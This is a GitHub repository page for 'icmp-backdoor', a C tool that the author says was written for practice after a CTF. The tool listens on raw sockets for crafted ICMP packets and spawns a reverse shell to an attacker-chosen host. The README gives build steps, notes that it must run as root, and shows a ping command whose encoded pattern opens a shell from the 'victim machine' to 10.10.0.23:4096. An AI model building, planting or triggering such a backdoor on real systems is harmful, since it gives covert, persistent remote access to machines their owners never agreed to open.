Skip to content

Backdoor that listens for specially crafted ICMP packets and spawns reverse shells.

License

Notifications You must be signed in to change notification settings

chutuananh2k/icmp-backdoor

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

icmp-backdoor

During the BSidesLV Pros vs. Joes CTF, it was revealed that the red cell used a very similar tool to this known as prism to achieve persistence in a few of our machines. I decided to write my own tool similar to this for practice.

Prism: https://github.com/andreafabrizi/prism

The concept behind this tool is that it listens for specially crafted ICMP packets, and if they match a certain criteria, it will spawn a reverse shell to a specified host and port.

Building

First, you should edit icmp-backdoor.c. In particular, change the MAGIC1, MAGIC2, and PROGNAME macros to values that suit your needs.

Next, just use make. This has currently been tested only on Linux. Will test on BSD, macOS and others soon:

$ make

If you don't have make or if gcc isn't your thing:

$ clang -o icmp-backdoor icmp-backdoor.c

Usage

Since this uses SOCK_RAW, you must run this as root or otherwise have the ability to open raw sockets as the user that initially runs this.

Prism uses its own tool to send the packets. I opted for a "live off the land" approach and use the commonly-available ping utility with the -p flag:

$ ping -c 1 -p 0a0a001710002a7a host

The format for the pattern is: IIIIIIIIPPPPMMMM where I is IP address, P is port, and M is magic bytes. This is represented as hexadecimal, so you will either have to be a weirdo like me and be able to calculate this in your head or use a calculator.

See the included calc.py for a handy calculator for this.

In the above example:

IP: 0a0a0017 is 10.10.0.23
Port: 1000 is 4096
Magic is 2a7a, which is hard-coded into this program.

This will open a reverse shell from the victim machine to 10.10.0.23:4096.

The magic bytes are there for alignment purposes when using the -p flag with ping and as a mechanism to determine if a shell should be opened when an ICMP packet is received.

About

Backdoor that listens for specially crafted ICMP packets and spawns reverse shells.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 93.9%
  • Python 3.3%
  • Makefile 2.8%